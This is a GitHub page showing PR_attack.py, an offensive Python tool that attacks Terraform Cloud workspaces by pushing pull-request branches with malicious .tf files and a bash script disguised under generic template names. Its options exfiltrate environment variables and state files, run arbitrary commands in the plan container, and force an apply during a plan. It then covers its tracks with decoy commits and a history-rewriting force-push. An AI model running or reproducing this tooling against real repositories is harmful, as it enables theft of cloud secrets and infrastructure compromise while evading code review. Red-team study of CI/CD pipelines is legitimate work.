-
Notifications
You must be signed in to change notification settings - Fork 4
Expand file tree
/
Copy pathPR_attack.py
More file actions
255 lines (222 loc) · 12 KB
/
PR_attack.py
File metadata and controls
255 lines (222 loc) · 12 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
### Variable Info ###
# the "repo" argument is the git repo of a TF workspace that is going to be cloned and targeted by these attacks
# the "folder" argument is the name of the directory within the git repo that holds the .tf files
# "tmp folder" is the parent directory where the targeted repository is being cloned to.
# So the full path looks something like:
# .../tmp/repo/folder
###
import argparse
import os
import subprocess
from string import Template
import tempfile
import shutil
import sys
import re
# Name of the temporary branch used to commit the malicious code
TMP_BRANCH = "SEC-0000"
# Directory containing this script; empty until main() fills it in via get_script_path()
SCRIPT_PATH = ""
def get_script_path():
    """Return the directory that contains the invoked script.

    The location is derived from ``sys.argv[0]`` with symlinks resolved.
    """
    script_file = os.path.realpath(sys.argv[0])
    return os.path.dirname(script_file)
# It checks if the git binary is present in the system
def check_git_binary():
    """Report whether a working ``git`` client can be launched from the shell.

    Returns:
        bool: True when ``git --version`` exits with status 0 (the first line
        of its output is printed), False otherwise.
    """
    # getoutput() goes through the shell and never raises when the program is
    # missing: the shell's "not found" message simply ends up in the captured
    # text. The exit status is the reliable signal, so request it explicitly.
    status, output = subprocess.getstatusoutput("git --version")
    if status != 0:
        return False
    print("[+] Found git client, %s" % output.split('\n')[0])
    return True
# It creates a temporary folder that will be used to clone the target repository and add the malicious tf code
def setup_temp_folder(repo):
    """Clone *repo* into a new temporary directory and check out TMP_BRANCH.

    The process working directory is changed to the clone and is left there
    on return; the git commands issued by the rest of the script run
    relative to it.

    Args:
        repo: Repository location passed to ``git clone``.

    Returns:
        str: Path of the temporary directory that holds the clone.

    Exits the process with status -1 (after deleting the temporary
    directory) when ``git clone`` fails.
    """
    import shlex  # local import: only needed to quote the shell arguments below

    tmp_folder = tempfile.mkdtemp()
    print(f"[+] Created temporal folder {tmp_folder}")

    # First we clone the repository
    print(f"[+] Cloning repository {repo}")
    # Judge success by the exit status instead of searching the output for
    # "done", and quote both arguments so spaces or shell metacharacters in
    # them cannot change the command that is executed.
    status, _ = subprocess.getstatusoutput(
        f"git clone --progress {shlex.quote(repo)} {shlex.quote(tmp_folder)}"
    )
    if status != 0:
        print(f"[!] It seems like there is some issue cloning the repo you provided, check it manually:\ngit clone {repo}")
        shutil.rmtree(tmp_folder)
        sys.exit(-1)

    # Second, we create a branch to add the malicious files
    print(f"[+] Creating branch {TMP_BRANCH}")
    os.chdir(tmp_folder)
    branches = subprocess.getoutput("git branch -a")
    if TMP_BRANCH in branches:
        print(f"[!] {TMP_BRANCH} already exists, you can delete it with the following command:")
        print(f"cd {tmp_folder}; git push origin --delete {TMP_BRANCH}; cd -")
        # TODO: Remove this
        # The working directory is already the clone, so no "cd" is needed.
        subprocess.getoutput(f"git push origin --delete {TMP_BRANCH}")
        # exit(-1)
    subprocess.getoutput(f"git checkout -b {TMP_BRANCH}")
    return tmp_folder
# Attack 1 - exfil all env vars into TF plan results
# TODO - add option to exfil to an external host
def get_all_envs(tmp_folder, terraform_folder):
    """Add the ``get_all_envs.tf`` template to the clone, commit it and push TMP_BRANCH.

    The git commands run in the current working directory, which
    setup_temp_folder() has changed to the clone.

    Args:
        tmp_folder: Directory the target repository was cloned into.
        terraform_folder: Folder inside the repository that holds the .tf files.

    Returns:
        str: The text in the ``git push`` output that matches
        ``http.*<TMP_BRANCH>``; main() prints it as the URL for opening the PR.

    Raises:
        RuntimeError: If the push output contains no such URL (for example
            because the push was rejected).
    """
    # We use a name that is generic but unique
    file_name = "template_instance000.tf"
    src_file = os.path.join(SCRIPT_PATH, "templates/get_all_envs.tf")
    dst_file = os.path.join(tmp_folder, terraform_folder, file_name)
    print(f"[+] Copying template file from {src_file} to {dst_file}")
    shutil.copy(src_file, dst_file)

    # We add the file performing the attack
    print("[+] Commiting get_all_envs locally")
    subprocess.getoutput("git add " + os.path.join(terraform_folder, file_name))
    subprocess.getoutput("git commit -m 'Testing TF plan for template instance'")
    print("[+] Pushing get_all_envs commit to origin")
    output = subprocess.getoutput("git push origin " + TMP_BRANCH)

    # Fail with the captured output instead of an AttributeError on None.
    match = re.search(f"http.*{TMP_BRANCH}", output)
    if match is None:
        raise RuntimeError(f"No pull request URL found in the git push output:\n{output}")
    return match.group(0)
def exec_command(tmp_folder, terraform_folder, command):
    """Add the ``exec_command.tf`` template filled with *command*, commit it and push TMP_BRANCH.

    The git commands run in the current working directory, which
    setup_temp_folder() has changed to the clone.

    Args:
        tmp_folder: Directory the target repository was cloned into.
        terraform_folder: Folder inside the repository that holds the .tf files.
        command: Value substituted for the ``command`` placeholder of the template.

    Returns:
        str: The text in the ``git push`` output that matches
        ``http.*<TMP_BRANCH>``; main() prints it as the URL for opening the PR.

    Raises:
        RuntimeError: If the push output contains no such URL.
    """
    # We use a name that is generic but unique
    file_name = "template_instance001.tf"
    src_file = os.path.join(SCRIPT_PATH, "templates/exec_command.tf")
    dst_file = os.path.join(tmp_folder, terraform_folder, file_name)
    print(f"[+] Copying template file from {src_file} to {dst_file}")
    shutil.copy(src_file, dst_file)

    # Fill in the placeholder. The substitution happens before the file is
    # reopened for writing, so a failed substitution does not truncate it.
    with open(dst_file, "r") as handle:
        template = Template(handle.read())
    template_filled = template.substitute(command=command)
    with open(dst_file, "w") as handle:
        handle.write(template_filled)

    # We add the file performing the attack
    print("[+] Commiting the template locally")
    subprocess.getoutput("git add " + os.path.join(terraform_folder, file_name))
    subprocess.getoutput("git commit -m 'Testing TF plan for template instance'")
    print("[+] Pushing exec_command commit to origin")
    output = subprocess.getoutput("git push origin " + TMP_BRANCH)

    # Fail with the captured output instead of an AttributeError on None.
    match = re.search(f"http.*{TMP_BRANCH}", output)
    if match is None:
        raise RuntimeError(f"No pull request URL found in the git push output:\n{output}")
    return match.group(0)
def apply_on_plan(tmp_folder, terraform_folder, tf_file_to_apply):
    """Add the files for the apply-on-plan case, commit them and push TMP_BRANCH.

    Three files are written into ``<tmp_folder>/<terraform_folder>``:
    ``template_instance002.tf`` (``exec_command.tf`` with the command set to
    ``bash instance.tpl``), ``template_instance003`` (a copy of
    *tf_file_to_apply*) and ``instance.tpl`` (a copy of
    ``templates/apply_on_plan.sh``).

    The git commands run in the current working directory, which
    setup_temp_folder() has changed to the clone.

    Args:
        tmp_folder: Directory the target repository was cloned into.
        terraform_folder: Folder inside the repository that holds the .tf files.
        tf_file_to_apply: Path of the .tf file to include, joined onto SCRIPT_PATH.

    Returns:
        str: The text in the ``git push`` output that matches
        ``http.*<TMP_BRANCH>``; main() prints it as the URL for opening the PR.

    Raises:
        RuntimeError: If the push output contains no such URL.
    """
    target_dir = os.path.join(tmp_folder, terraform_folder)

    # Copying template to execute a command
    # We use a name that is generic but unique
    src_file = os.path.join(SCRIPT_PATH, "templates/exec_command.tf")
    dst_file = os.path.join(target_dir, "template_instance002.tf")
    print(f"[+] Copying template file from {src_file} to {dst_file}")
    shutil.copy(src_file, dst_file)
    with open(dst_file, "r") as handle:
        template = Template(handle.read())
    # The command we will run is a bash script
    template_filled = template.substitute(command="bash instance.tpl")
    with open(dst_file, "w") as handle:
        handle.write(template_filled)

    # We add the "malicious tf file"
    src_file = os.path.join(SCRIPT_PATH, tf_file_to_apply)
    dst_file = os.path.join(target_dir, "template_instance003")
    print(f"[+] Copying template file from {src_file} to {dst_file}")
    shutil.copy(src_file, dst_file)

    # We add the bash script that performs the apply
    # Pretend the malicious script is a .tpl file
    src_file = os.path.join(SCRIPT_PATH, "templates/apply_on_plan.sh")
    dst_file = os.path.join(target_dir, "instance.tpl")
    print(f"[+] Copying template file from {src_file} to {dst_file}")
    shutil.copy(src_file, dst_file)

    # We add the files performing the attack
    print("[+] Commiting the template locally")
    for file_name in ("template_instance002.tf", "template_instance003", "instance.tpl"):
        subprocess.getoutput("git add " + os.path.join(terraform_folder, file_name))
    subprocess.getoutput("git commit -m 'Testing TF plan for template instance'")
    print("[+] Pushing commit to origin")
    output = subprocess.getoutput("git push origin " + TMP_BRANCH)

    # Fail with the captured output instead of an AttributeError on None.
    match = re.search(f"http.*{TMP_BRANCH}", output)
    if match is None:
        raise RuntimeError(f"No pull request URL found in the git push output:\n{output}")
    return match.group(0)
def get_state_file(tmp_folder, terraform_folder, workspace=None):
    """Add the files for the state-file case, commit them and push TMP_BRANCH.

    Two files are written into ``<tmp_folder>/<terraform_folder>``:
    ``template_instance002.tf`` (``exec_command.tf`` with the command set to
    ``bash instance.tpl``, followed by *workspace* when one is given) and
    ``instance.tpl`` (a copy of ``templates/retrieve_state_file.sh``).

    The git commands run in the current working directory, which
    setup_temp_folder() has changed to the clone.

    Args:
        tmp_folder: Directory the target repository was cloned into.
        terraform_folder: Folder inside the repository that holds the .tf files.
        workspace: Optional workspace name appended as the script's argument.

    Returns:
        str: The text in the ``git push`` output that matches
        ``http.*<TMP_BRANCH>``; main() prints it as the URL for opening the PR.

    Raises:
        RuntimeError: If the push output contains no such URL.
    """
    target_dir = os.path.join(tmp_folder, terraform_folder)

    # Copying template to execute a command
    # We use a name that is generic but unique
    src_file = os.path.join(SCRIPT_PATH, "templates/exec_command.tf")
    dst_file = os.path.join(target_dir, "template_instance002.tf")
    print(f"[+] Copying template file from {src_file} to {dst_file}")
    shutil.copy(src_file, dst_file)
    with open(dst_file, "r") as handle:
        template = Template(handle.read())
    # The command we will run is a bash script
    command = "bash instance.tpl"
    if workspace is not None:
        command = f"bash instance.tpl {workspace}"
    template_filled = template.substitute(command=command)
    with open(dst_file, "w") as handle:
        handle.write(template_filled)

    # We add the bash script that performs the tf statefile exfil
    # Pretend the malicious script is a .tpl file
    src_file = os.path.join(SCRIPT_PATH, "templates/retrieve_state_file.sh")
    dst_file = os.path.join(target_dir, "instance.tpl")
    print(f"[+] Copying template file from {src_file} to {dst_file}")
    shutil.copy(src_file, dst_file)

    # We add the files performing the attack
    print("[+] Commiting the template locally")
    for file_name in ("template_instance002.tf", "instance.tpl"):
        subprocess.getoutput("git add " + os.path.join(terraform_folder, file_name))
    subprocess.getoutput("git commit -m 'Testing TF plan for template instance'")
    print("[+] Pushing commit to origin")
    output = subprocess.getoutput("git push origin " + TMP_BRANCH)

    # Fail with the captured output instead of an AttributeError on None.
    match = re.search(f"http.*{TMP_BRANCH}", output)
    if match is None:
        raise RuntimeError(f"No pull request URL found in the git push output:\n{output}")
    return match.group(0)
# To be a bit more sneaky we commit a couple times so it's not as easy to see the malicious code in the PR
def rewrite_history(tmp_folder, terraform_folder):
    """Push two placeholder commits, then force-push the branch back to origin/main.

    Each placeholder commit overwrites ``<terraform_folder>/template_instance000.tf``
    with a small ``aws_ec2_host`` resource and pushes it. Afterwards the local
    branch is hard-reset to ``origin/main`` and force-pushed.

    All paths and git commands are relative to the current working directory.

    Args:
        tmp_folder: Not referenced in the body.
        terraform_folder: Folder (relative to the working directory) in which
            ``template_instance000.tf`` is rewritten.

    NOTE(review): the ``git add`` calls use the literal path
    ``nullprovider/template_instance000.tf`` rather than *terraform_folder*,
    and the pushes use the literal ``SEC-0000`` / ``origin/main`` rather than
    TMP_BRANCH or the repository's default branch - confirm this is intended.
    """
    # First commit
    fake_template = """
resource "aws_ec2_host" "template_instance" {
instance_type = "c5.large"
availability_zone = "us-west-2a"
}
"""
    open(os.path.join(terraform_folder, "template_instance000.tf"), "w").write(fake_template)
    subprocess.getoutput("git add nullprovider/template_instance000.tf")
    subprocess.getoutput("git commit -m 'Adding EC2 template'")
    print("[+] Pushing one commit replacing the malicious template")
    subprocess.getoutput("git push origin SEC-0000")
    # Second commit
    fake_template = """
resource "aws_ec2_host" "template_instance" {
instance_type = "c4.large"
availability_zone = "us-west-2a"
}
"""
    open(os.path.join(terraform_folder, "template_instance000.tf"), "w").write(fake_template)
    subprocess.getoutput("git add nullprovider/template_instance000.tf")
    subprocess.getoutput("git commit -m 'Changing instance size to c4'")
    print("[+] Pushing one commit with a fake fix")
    subprocess.getoutput("git push origin SEC-0000")
    # Reset HEAD and force push to rewrite history
    subprocess.getoutput("git fetch origin && git reset --hard origin/main")
    print("[+] Rewriting history, this will automatically close the PR")
    subprocess.getoutput("git push --force origin SEC-0000")
def parse_args():
    """Parse the command line and return the resulting namespace.

    ``--repo`` and ``--folder`` are mandatory. Exactly one option from the
    mutually exclusive attack group must be supplied as well.
    """
    parser = argparse.ArgumentParser()

    # Mandatory string options describing the target.
    required_options = (
        ('--repo', "Github repository (SSH url) that is going to be targeted"),
        ('--folder', "Folder in the repo that contains the terraform files where you wish the attack to take place"),
    )
    for flag, description in required_options:
        parser.add_argument(flag, type=str, help=description, required=True)

    attack_group = parser.add_mutually_exclusive_group(required=True)

    # Attack selectors that are plain on/off switches.
    switch_options = (
        ('--get_envs', "This retrieves the environment variables from a TF workspaces"),
        ('--get_state_file', "This retrieves the state file of the current TF workspace through a TF plan; useful when the user doesn't have permissions to access the state file"),
    )
    for flag, description in switch_options:
        attack_group.add_argument(flag, action='store_true', help=description)

    # Attack selectors that carry a string value.
    value_options = (
        ('--get_state_file_from_workspace', "This retrieves the state file of a supplied workspace name through a TF plan; useful when the user doesn't have permissions to access the state file"),
        ('--exec_command', "Runs a command in the container used to run the speculative plan, useful to access TFC infra and access Cloud metadata if misconfigured"),
        ('--apply_on_plan', "Apply on plan an specified tf file"),
    )
    for flag, description in value_options:
        attack_group.add_argument(flag, type=str, help=description)

    return parser.parse_args()
def main():
    """Command-line entry point.

    Parses the arguments, records the script directory in SCRIPT_PATH,
    verifies that git is available, clones the repository, runs the selected
    action, prints the URL returned by it, waits for the user, calls
    rewrite_history() and finally removes the temporary clone.

    Exits the process with status -1 when git is not available.
    """
    global SCRIPT_PATH

    args = parse_args()
    SCRIPT_PATH = get_script_path()
    if not check_git_binary():
        print("git binary not found in your system")
        sys.exit(-1)

    # Create a temp folder to use it during the attack
    tmp_folder = setup_temp_folder(args.repo)
    try:
        # String options are compared against None so that an empty-string
        # value still selects its branch instead of leaving url_pr unbound.
        # The argument group is required and mutually exclusive, so the final
        # else can only be --get_state_file_from_workspace.
        if args.get_envs:
            url_pr = get_all_envs(tmp_folder, args.folder)
        elif args.exec_command is not None:
            url_pr = exec_command(tmp_folder, args.folder, args.exec_command)
        elif args.apply_on_plan is not None:
            url_pr = apply_on_plan(tmp_folder, args.folder, args.apply_on_plan)
        elif args.get_state_file:
            url_pr = get_state_file(tmp_folder, args.folder)
        else:
            url_pr = get_state_file(tmp_folder, args.folder, args.get_state_file_from_workspace)

        # Show to the user the URL to create a Github PR
        print("[!] Visit the following URL to complete the PR that will trigger the TF attack")
        if args.get_envs or args.exec_command is not None:
            print("[!] Once the PR is created, view the TF plan results for your environment variables")
        print(url_pr)
        # ToDo: Tell the user to check for the output
        # ToDo : Ask user if he/she wants to rewrite history to delete what we did
        # (Do that only after the PR has been submmited)
        input("Press any key when you have finished the plan to begin cleanup")
        rewrite_history(tmp_folder, args.folder)
    finally:
        # Remove the temporary folder even when one of the steps above failed
        shutil.rmtree(tmp_folder)
# Run the command-line interface only when the file is executed as a script.
if __name__ == "__main__":
    main()